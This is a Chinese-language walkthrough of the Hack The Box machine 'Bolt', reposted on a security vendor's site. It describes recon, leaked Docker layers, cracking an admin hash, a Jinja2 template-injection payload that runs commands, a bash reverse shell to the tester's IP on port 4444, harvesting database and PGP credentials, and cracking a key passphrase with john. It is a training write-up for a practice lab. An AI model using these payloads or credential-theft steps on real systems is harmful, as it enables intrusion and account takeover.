长亭百川云 - 文章详情

【HTB系列】Bolt

承影安全团队ChengYingTeam

58

2024-07-13

0x01 信息收集

`─# nmap  10.10.11.114  -p- -sC -sV  --min-rate=2000``Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 08:34 EST``Nmap scan report for 10.10.11.114``Host is up (0.31s latency).``Not shown: 65532 closed tcp ports (reset)``PORT    STATE SERVICE  VERSION``22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)``| ssh-hostkey:` `|   3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)``|   256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)``|_  256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)``80/tcp  open  http     nginx 1.18.0 (Ubuntu)``|_http-title:     Starter Website -  About` `|_http-server-header: nginx/1.18.0 (Ubuntu)``443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)``| http-title: Passbolt | Open source password manager for teams``|_Requested resource was /auth/login?redirect=%2F``| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU``| Not valid before: 2021-02-24T19:11:23``|_Not valid after:  2022-02-24T19:11:23``|_http-server-header: nginx/1.18.0 (Ubuntu)``|_ssl-date: TLS randomness does not represent time``Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel``   ``Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .``Nmap done: 1 IP address (1 host up) scanned in 70.73 seconds``   `

访问网站又一个登录口,还可以创建账户。走一个。不行。有报错

打开后发现是几个虚拟机镜像,有一些信息泄露

0x02 漏洞挖掘

─\# cat repositories                                                           
{"flask-dashboard-adminlte\_appseed-app":{"latest":"3350815d3bdf21771408f91da4551ca6f4e82edce74e9352ed75c2e8a5e68162"}}  

这里说,最后一个版本是 xxx。进入目录app/base/__pycache__下发现两个pyc文件。反编译后代码如下:

 pip3 install uncompyle6 \-i https://pypi.tuna.tsinghua.edu.cn/simple/ 

当作知识点吧。反编译根源码还是差点。下面发现了源码贴了上来

`# -*- encoding: utf-8 -*-``"""``Copyright (c) 2019 - present AppSeed.us``"""``   ``from flask import jsonify, render_template, redirect, request, url_for``from flask_login import (`    `current_user,`    `login_required,`    `login_user,`    `logout_user``)``   ``from app import db, login_manager``from app.base import blueprint``from app.base.forms import LoginForm, CreateAccountForm``from app.base.models import User``from hmac import compare_digest as compare_hash``import crypt``   ``@blueprint.route('/')``def route_default():`    `return redirect(url_for('base_blueprint.login'))``   ``## Login & Registration``   ``@blueprint.route('/login', methods=['GET', 'POST'])``def login():`    `login_form = LoginForm(request.form)`    `if 'login' in request.form:`        `        # read form data`        `username = request.form['username']`        `password = request.form['password']``   `        `# Locate user`        `user = User.query.filter_by(username=username).first()`        `        # Check the password`        `stored_password = user.password`        `stored_password = stored_password.decode('utf-8')`        `if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):``   `            `login_user(user)`            `return redirect(url_for('base_blueprint.route_default'))``   `        `# Something (user or pass) is not ok`        `return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)``   `    `if not current_user.is_authenticated:`        `return render_template( 'accounts/login.html',`                                `form=login_form)`    `return redirect(url_for('home_blueprint.index'))``   ``@blueprint.route('/register', methods=['GET', 'POST'])``def register():`    `login_form = LoginForm(request.form)`    `create_account_form = CreateAccountForm(request.form)`    `if 'register' in request.form:``   `        `username  = request.form['username']`        `email     = request.form['email'   ]`        `data = User.query.filter_by(email=email).first()`        `if data is None:`            `# Check usename exists`            `user = User.query.filter_by(username=username).first()`            `if user:`                `return render_template( 'accounts/register.html',``                                    msg='Username already registered',`                                    `success=False,`                                    `form=create_account_form)``   `            `# Check email exists`            `user = User.query.filter_by(email=email).first()`            `if user:`                `return render_template( 'accounts/register.html',``                                     msg='Email already registered',  ``                                    success=False,`                                    `form=create_account_form)``   `            `# else we can create the user`            `user = User(**request.form)`            `db.session.add(user)`            `db.session.commit()``   `            `return render_template( 'accounts/register.html',``                                 msg='User created please <a href="/login">login</a>',  ``                                success=True,`                                `form=create_account_form)``   `    `else:`        `return render_template( 'accounts/register.html', form=create_account_form)``   ``@blueprint.route('/logout')``def logout():`    `logout_user()`    `return redirect(url_for('base_blueprint.login'))``   ``## Errors``   ``@login_manager.unauthorized_handler``def unauthorized_handler():`    `return render_template('page-403.html'), 403``   ``@blueprint.errorhandler(403)``def access_forbidden(error):`    `return render_template('page-403.html'), 403``   ``@blueprint.errorhandler(404)``def not_found_error(error):`    `return render_template('page-404.html'), 404``   ``@blueprint.errorhandler(500)``def internal_error(error):`    `return render_template('page-500.html'), 500``   `
`└─# cat forms.py` `# uncompyle6 version 3.8.0``# Python bytecode 3.6 (3379)``# Decompiled from: Python 3.9.7 (default, Sep 24 2021, 09:43:00)` `# [GCC 10.3.0]``# Embedded file name: /app/base/forms.py``# Compiled at: 2021-03-05 12:48:36``# Size of source mod 2**32: 791 bytes``"""``Copyright (c) 2019 - present AppSeed.us``"""``from flask_wtf import FlaskForm``from wtforms import TextField, PasswordField``from wtforms.validators import InputRequired, Email, DataRequired``   ``class LoginForm(FlaskForm):`    `username = TextField('Username', id='username_login', validators=[DataRequired()])`    `password = PasswordField('Password', id='pwd_login', validators=[DataRequired()])``   ``   ``class CreateAccountForm(FlaskForm):`    `username = TextField('Username', id='username_create', validators=[DataRequired()])`    `email = TextField('Email', id='email_create', validators=[DataRequired(), Email()])`    `password = PasswordField('Password', id='pwd_create', validators=[DataRequired()])``# okay decompiling forms.cpython-36.pyc`                                         

东西太多, 先看哪些重要的

for i in a:  
    os.system("tar -tvf"+i)

几个特殊的文件列一下:

`a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar``-rw-r--r-- root/root     16384 2021-03-05 12:44 db.sqlite3``   ``2265c5097f0b290a53b7556fd5d721ffad8a4921bfc2a6e378c04859185d27fa/layer.tar``-rw-r--r-- root/root       791 2021-03-05 12:48 app/base/forms.py``-rw-r--r-- root/root      3778 2021-03-05 12:49 app/base/routes.py``745959c3a65c3899f9e1a5319ee5500f199e0cadf8d487b92e2f297441f8c5cf/layer.tar``-rw-r--r-- root/root       142 2021-03-05 06:11 .env``-rw-r--r-- root/root      1448 2021-03-05 09:22 config.py``-rw-r--r-- root/root       198 2021-03-05 06:11 gunicorn-cfg.py``-rw-r--r-- root/root       116 2021-03-05 07:40 requirements.txt``-rw-r--r-- root/root       955 2021-03-05 06:11 run.py``   `

config.py文件中有一个sqllite3连接和postfreSQl数据库的账号密码。

    #PostgreSQL database  
    SQLALCHEMY\_DATABASE\_URI = '{}://{}:{}@{}:{}/{}'.format(  
        config( 'DB\_ENGINE'   , default\='postgresql'    ),  
        config( 'DB\_USERNAME' , default\='appseed'       ),  
        config( 'DB\_PASS'     , default\='pass'          ),  
        config( 'DB\_HOST'     , default\='localhost'     ),  
        config( 'DB\_PORT'     , default\=5432            ),  
        config( 'DB\_NAME'     , default\='appseed-flask' )  
    )  

admin   admin@bolt.htb  $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.

密码密文。通过接口login可以发现接口是这样加密的

        `# read form data`        `username = request.form['username']`        `password = request.form['password']``   `        `# Locate user`        `user = User.query.filter_by(username=username).first()`        `        # Check the password`        `stored_password = user.password`        `stored_password = stored_password.decode('utf-8')`        `if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):``   `            `login_user(user)`            `return redirect(url_for('base_blueprint.route_default'))``   `

根据代码逻辑,关键在于使用username 查询后创建了一个user对象。用户登录的条件是用户存在,且用户密码和用户原始密码(用密文当盐)的加密相比的,竟然能等于原来的值。一脸懵逼。解密出如下密码:

admin/deadbolt

到这里感觉没东西了

扫描一下vhost,找到两个子域名 demomail

现在有三个网站了。

demo.bolt.htb#一个登录界面,能够创建用户,需要一个invite code  
mail.boot.htb  #一个登录界面  
passbolt.bolt.htb AdminLTE3

config.py中还配置了一个SECRET_KEY default='S#perS3crEt_007'

尝试一下不行

找了好久找到了

'XNSS-HSJW-3NGU-8XTJ'
curl -i -s -k -X $'POST' \\  
    -H $'Host: demo.bolt.htb' \\  
    --data-binary $'\\x0d\\x0ausername=123&email=123@qq.com&password=123&invite\_code=XNSS-HSJW-3NGU-8XTJ' \\  
    $'http://demo.bolt.htb/register'

注册后发现可以登录mail,mail应该是一个邮件服务器。

邮件服务可以登录,发现修改一下配置,会收到一个邮件???因为是pyhon的尝试模版注入。

点击后,发现一个新的邮件,出现了10000,说明name参数处存在SSTI注入漏洞。

{{"".\_\_class\_\_.\_\_bases\_\_\[0\].\_\_subclasses\_\_()}}

查看到  popen是223个

  
{{"".\_\_class\_\_.\_\_bases\_\_\[0\].\_\_subclasses\_\_()\[222\]}}  
<class 'subprocess.Popen'>

最终调用初始化,发现不行。

{{"".\_\_class\_\_.\_\_bases\_\_\[0\].\_\_subclasses\_\_()\[222\].\_\_init\_\_}}  
<slot wrapper '\_\_init\_\_' of 'object' objects>

由于使用了模板jinja2,尝试搜了下payload:

`{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen("whoami").read()}}``   ``www-data`

0x03 获取权限

同样的方法发送payload:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1"').read() }}
`└─# nc -lvnp 4444``listening on [any] 4444 ...``connect to [10.10.14.50] from (UNKNOWN) [10.10.11.114] 50808``bash: cannot set terminal process group (1012): Inappropriate ioctl for device``bash: no job control in this shell``www-data@bolt:~/demo$ id``id``uid=33(www-data) gid=33(www-data) groups=33(www-data)``www-data@bolt:~/demo$ whoami``whoami``www-data``   `

0x04 权限提升

`www-data@bolt:~/demo$ cat /etc/passwd|grep -v nologin |grep -v false``cat /etc/passwd|grep -v nologin |grep -v false``root:x:0:0:root:/root:/bin/bash``sync:x:4:65534:sync:/bin:/bin/sync``eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash``clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash`

www-data ->eddie

`[-] /etc/init/ config file permissions:``total 24``drwxr-xr-x   2 root root  4096 Sep  9 10:07 .``drwxr-xr-x 135 root root 12288 Sep 20 15:05 ..``-rw-r--r--   1 root root  1757 Nov  6  2019 mysql.conf``-rw-r--r--   1 root root   453 Dec  2  2020 whoopsie.conf`
`[-] Any interesting mail in /var/mail:``total 24``drwxrwsr-x  3 root     mail 4096 Dec 17 00:27 .``drwxr-xr-x 15 root     root 4096 Aug  4 13:06 ..``drwx--S---  5     5001 mail 4096 Dec 19 08:23 123``-rw-------  1 eddie    mail  909 Feb 25  2021 eddie``-rw-------  1 root     mail    1 Mar  3  2021 root``-rw-------  1 www-data mail    1 Mar  3  2021 www-data`

没找到什么可利用的点。

根据用户查文件:

`www-data@bolt:/var/lib/passbolt/tmp$ find /etc -user www-data 2>/dev/null``find /etc -user www-data 2>/dev/null``/etc/passbolt/Seeds`
/etc/passbolt/Seeds

passbolt.php 中存在一个passwd: rT2;jW7<eY8!dX8}pQ8%有如下关键信息:

`return [`    `'App' => [`        `// A base URL to use for absolute links.`        `// The url where the passbolt instance will be reachable to your end users.`        `// This information is need to render images in emails for example`        `'fullBaseUrl' => 'https://passbolt.bolt.htb',`    `],``   `    `// Database configuration.`    `'Datasources' => [`        `'default' => [`            `'host' => 'localhost',`            `'port' => '3306',`            `'username' => 'passbolt',`            `'password' => 'rT2;jW7<eY8!dX8}pQ8%',`            `'database' => 'passboltdb',`        `],`    `],`

数据库连接上,没什么关键信息。

`select * from users;``+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+``| id                                   | role_id                              | username       | active | deleted | created             | modified            |``+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+``| 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | eddie@bolt.htb |      1 |       0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 |``| 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 | clark@bolt.htb |      1 |       0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 |`

还有一个奇怪的东西

`-----BEGIN PGP MESSAGE-----``Version: OpenPGP.js v4.10.9``Comment: https://openpgpjs.org``   ``wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5psc``g/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kY``pCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3H``oAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Px``l+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218R``zyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQp``edLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+u``l0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCt``oPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7``FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov``8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey``5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tY``NdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5a``Iebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhs``nO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6``TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984``=P38i``-----END PGP MESSAGE-----``   `

eddie ->root

OpenPGP是一个加密工具。

比之前多了一个数据库密码。尝试连接切换用户。

其中eddie用户成功。

在邮件中发现有收到来自Clark的用户的邮件,邮件里提到密码管理系统和私钥备份。邮件如下:

`eddie@bolt:/var/mail$ cat eddie``cat eddie``From clark@bolt.htb  Thu Feb 25 14:20:19 2021``Return-Path: <clark@bolt.htb>``X-Original-To: eddie@bolt.htb``Delivered-To: eddie@bolt.htb``Received: by bolt.htb (Postfix, from userid 1001)`        `id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)``Subject: Important!``To: <eddie@bolt.htb>``X-Mailer: mail (GNU Mailutils 3.7)``Message-Id: <20210225212019.DFF264CD@bolt.htb>``Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)``From: Clark Griswold <clark@bolt.htb>``   ``Hey Eddie,``   ``The password management server is up and running.  Go ahead and download the extension to your browser and get logged in.  Be sure to back up your private key because I CANNOT recover it.  Your private key is the only way to recover your account.``Once you're set up you can start importing your passwords.  Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...``   ``-Clark`

还发现了一个CVE-2021-22555

github搜了一个不行,回头再看。

还有一个信息。

══════════╣ Do I have PGP keys?  
/usr/bin/gpg                                                                                                                                           
netpgpkeys Not Found  
netpgp Not Found  

什么是PGP???

https://gist.github.com/jhjguxin/6037564

如果不熟悉先在本地测试。

`══╣ Possible private SSH keys were found!``/etc/ImageMagick-6/mime.xml``/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js``/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js``/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log`

在文件中找到三个公钥。。。,一个私钥,私钥如下

`-----BEGIN PGP PRIVATE KEY BLOCK-----``Version: OpenPGP.js v4.10.9``Comment: https://openpgpjs.org``   ``xcMGBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi``fjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk``cpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU``RNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU``+XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a``If70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB``AAH+CQMINK+e85VtWtjguB8IR+AfuDbIzHyKKvMfGStRhZX5cdsUfv5znicW``UjeGmI+w7iQ+WYFlmjFN/Qd527qOFOZkm6TgDMUVubQFWpeDvhM4F3Y+Fhua``jS8nQauoC87vYCRGXLoCrzvM03IpepDgeKqVV5r71gthcc2C/Rsyqd0BYXXA``iOe++biDBB6v/pMzg0NHUmhmiPnSNfHSbABqaY3WzBMtisuUxOzuvwEIRdac``2eEUhzU4cS8s1QyLnKO8ubvD2D4yVk+ZAxd2rJhhleZDiASDrIDT9/G5FDVj``QY3ep7tx0RTE8k5BE03NrEZi6TTZVa7MrpIDjb7TLzAKxavtZZYOJkhsXaWf``DRe3Gtmo/npea7d7jDG2i1bn9AJfAdU0vkWrNqfAgY/r4j+ld8o0YCP+76K/``7wiZ3YYOBaVNiz6L1DD0B5GlKiAGf94YYdl3rfIiclZYpGYZJ9Zbh3y4rJd2``AZkM+9snQT9azCX/H2kVVryOUmTP+uu+p+e51z3mxxngp7AE0zHqrahugS49``tgkE6vc6G3nG5o50vra3H21kSvv1kUJkGJdtaMTlgMvGC2/dET8jmuKs0eHc``Uct0uWs8LwgrwCFIhuHDzrs2ETEdkRLWEZTfIvs861eD7n1KYbVEiGs4n2OP``yF1ROfZJlwFOw4rFnmW4Qtkq+1AYTMw1SaV9zbP8hyDMOUkSrtkxAHtT2hxj``XTAuhA2i5jQoA4MYkasczBZp88wyQLjTHt7ZZpbXrRUlxNJ3pNMSOr7K/b3e``IHcUU5wuVGzUXERSBROU5dAOcR+lNT+Be+T6aCeqDxQo37k6kY6Tl1+0uvMp``eqO3/sM0cM8nQSN6YpuGmnYmhGAgV/Pj5t+cl2McqnWJ3EsmZTFi37Lyz1CM``vjdUlrpzWDDCwA8VHN1QxSKv4z2+QmXSzR5FZGRpZSBKb2huc29uIDxlZGRp``ZUBib2x0Lmh0Yj7CwI0EEAEIACAFAmA4G2EGCwkHCAMCBBUICgIEFgIBAAIZ``AQIbAwIeAQAhCRAcJ0Gj3DtKvRYhBN9Ca8ekqK9Y5Q7aDhwnQaPcO0q9+Q0H``/R2ThWBN8roNk7hCWO6vUH8Da1oXyR5jsHTNZAileV5wYnN+egxf1Yk9/qXF``nyG1k/IImCGf9qmHwHe+EvoDCgYpvMAQB9Ce1nJ1CPqcv818WqRsQRdLnyba``qx5j2irDWkFQhFd3Q806pVUYtL3zgwpupLdxPH/Bj2CvTIdtYD454aDxNbNt``zc5gVIg7esI2dnTkNnFWoFZ3+j8hzFmS6lJvJ0GN+Nrd/gAOkhU8P2KcDz74``7WQQR3/eQa0m6QhOQY2q/VMgfteMejlHFoZCbu0IMkqwsAINmiiAc7H1qL3F``U3vUZKav7ctbWDpJU/ZJ++Q/bbQxeFPPkM+tZEyAn/fHwwYEYDgbYQEIAJpY``HMNw6lcxAWuZPXYz7FEyVjilWObqMaAael9B/Z40fVH29l7ZsWVFHVf7obW5``zNJUpTZHjTQV+HP0J8vPL35IG+usXKDqOKvnzQhGXwpnEtgMDLFJc2jw0I6M``KeFfplknPCV6uBlznf5q6KIm7YhHbbyuKczHb8BgspBaroMkQy5LHNYXw2FP``rOUeNkzYjHVuzsGAKZZzo4BMTh/H9ZV1ZKm7KuaeeE2x3vtEnZXx+aSX+Bn8``Ko+nUJZEn9wzHhJwcsRGV94pnihqwlJsCzeDRzHlLORF7i57n7rfWkzIW8P7``XrU7VF0xxZP83OxIWQ0dXd5pA1fN3LRFIegbhJcAEQEAAf4JAwizGF9kkXhP``leD/IYg69kTvFfuw7JHkqkQF3cBf3zoSykZzrWNW6Kx2CxFowDd/a3yB4moU``KP9sBvplPPBrSAQmqukQoH1iGmqWhGAckSS/WpaPSEOG3K5lcpt5EneFC64f``a6yNKT1Z649ihWOv+vpOEftJVjOvruyblhl5QMNUPnvGADHdjZ9SRmo+su67``JAKMm0cf1opW9x+CMMbZpK9m3QMyXtKyEkYP5w3EDMYdM83vExb0DvbUEVFH``kERD10SVfII2e43HFgU+wXwYR6cDSNaNFdwbybXQ0quQuUQtUwOH7t/Kz99+``Ja9e91nDa3oLabiqWqKnGPg+ky0oEbTKDQZ7Uy66tugaH3H7tEUXUbizA6cT``Gh4htPq0vh6EJGCPtnyntBdSryYPuwuLI5WrOKT+0eUWkMA5NzJwHbJMVAlB``GquB8QmrJA2QST4v+/xnMLFpKWtPVifHxV4zgaUF1CAQ67OpfK/YSW+nqong``cVwHHy2W6hVdr1U+fXq9XsGkPwoIJiRUC5DnCg1bYJobSJUxqXvRm+3Z1wXO``n0LJKVoiPuZr/C0gDkek/i+p864FeN6oHNxLVLffrhr77f2aMQ4hnSsJYzuz``4sOO1YdK7/88KWj2QwlgDoRhj26sqD8GA/PtvN0lvInYT93YRqa2e9o7gInT``4JoYntujlyG2oZPLZ7tafbSEK4WRHx3YQswkZeEyLAnSP6R2Lo2jptleIV8h``J6V/kusDdyek7yhT1dXVkZZQSeCUUcQXO4ocMQDcj6kDLW58tV/WQKJ3duRt``1VrD5poP49+OynR55rXtzi7skOM+0o2tcqy3JppM3egvYvXlpzXggC5b1NvS``UCUqIkrGQRr7VTk/jwkbFt1zuWp5s8zEGV7aXbNI4cSKDsowGuTFb7cBCDGU``Nsw+14+EGQp5TrvCwHYEGAEIAAkFAmA4G2ECGwwAIQkQHCdBo9w7Sr0WIQTf``QmvHpKivWOUO2g4cJ0Gj3DtKvf4dB/9CGuPrOfIaQtuP25S/RLVDl8XHvzPm``oRdF7iu8ULcA9gTxPn8DNbtdZEnFHHOANAHnIFGgYS4vj3Dj9Q3CEZSSVvwg``6599FMcw9nGzypVOgqgQv8JGmIUeCipD10k8nHW7m9YBfQB04y9wJw99WNw/``Ic3vdhZ6NvsmLzYI21dnWD287sPj2tKAuhI0AqCEkiRwb4Z4CSGgJ5TgGML8``11Izrkqamzpc6mKBGi213tYH6xel3nDJv5TKm3AGwXsAhJjJw+9K0MNARKCm``YZFGLdtA/qMajW4/+T3DJ79YwPQOtCrFyHiWoIOTWfs4UhiUJIE4dTSsT/W0``PSwYYWlAywj5``=cqxZ``-----END PGP PRIVATE KEY BLOCK-----`

在数据库中还有一个pgp message是需要解密的密文

众所周知,私钥一般有密码,尝试破解私钥的密码

  • 使用gpg2john
`└─# gpg2john pri.key > tmp                                                                                                                                                               1 ⨯``File pri.key``   ``─# cat tmp`       `Eddie Johnson:$gpg$*1*668*2048*2b518595f971db147efe739e2716523786988fb0ee243e5981659a314dfd0779dbba8e14e6649ba4e00cc515b9b4055a9783be133817763e161b9a8d2f2741aba80bceef6024465cba02af3bccd372297a90e078aa95579afbd60b6171cd82fd1b32a9dd016175c088e7bef9b883041eaffe933383434752686688f9d235f1d26c006a698dd6cc132d8acb94c4eceebf010845d69cd9e114873538712f2cd50c8b9ca3bcb9bbc3d83e32564f99031776ac986195e643880483ac80d3f7f1b9143563418ddea7bb71d114c4f24e41134dcdac4662e934d955aeccae92038dbed32f300ac5abed65960e26486c5da59f0d17b71ad9a8fe7a5e6bb77b8c31b68b56e7f4025f01d534be45ab36a7c0818febe23fa577ca346023feefa2bfef0899dd860e05a54d8b3e8bd430f40791a52a20067fde1861d977adf222725658a4661927d65b877cb8ac977601990cfbdb27413f5acc25ff1f691556bc8e5264cffaebbea7e7b9d73de6c719e0a7b004d331eaada86e812e3db60904eaf73a1b79c6e68e74beb6b71f6d644afbf591426418976d68c4e580cbc60b6fdd113f239ae2acd1e1dc51cb74b96b3c2f082bc0214886e1c3cebb3611311d9112d61194df22fb3ceb5783ee7d4a61b544886b389f638fc85d5139f64997014ec38ac59e65b842d92afb50184ccc3549a57dcdb3fc8720cc394912aed931007b53da1c635d302e840da2e6342803831891ab1ccc1669f3cc3240b8d31eded96696d7ad1525c4d277a4d3123abecafdbdde207714539c2e546cd45c4452051394e5d00e711fa5353f817be4fa6827aa0f1428dfb93a918e93975fb4baf3297aa3b7fec33470cf2741237a629b869a762684602057f3e3e6df9c97631caa7589dc4b26653162dfb2f2cf508cbe375496ba735830c2c00f151cdd50c522afe33dbe4265d2*3*254*8*9*16*b81f0847e01fb836c8cc7c8a2af31f19*16777216*34af9ef3956d5ad8:::Eddie Johnson <eddie@bolt.htb>::pri.key`
  • 进行破解
`┌──(root💀kali)-[~/tmp]``└─# john --wordlist=/usr/share/wordlists/rockyou.txt tmp``Using default input encoding: UTF-8``Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])``Cost 1 (s2k-count) is 16777216 for all loaded hashes``Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 8 for all loaded hashes``Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes``Will run 4 OpenMP threads``Press 'q' or Ctrl-C to abort, almost any other key for status``merrychristmas   (Eddie Johnson)``1g 0:00:13:03 DONE (2021-12-20 11:05) 0.001277g/s 54.71p/s 54.71c/s 54.71C/s mhines..menudo``Use the "--show" option to display all of the cracked passwords reliably``Session completed`

解密:

`gpg --batch --import /tmp/pri.key``gpg --pinentry-mode loopback --passphrase merrychristmas -d /tmp/pub.key``   ``{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}`

切换用户到root,成功获取权限。

喜欢就请关注我们吧!

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2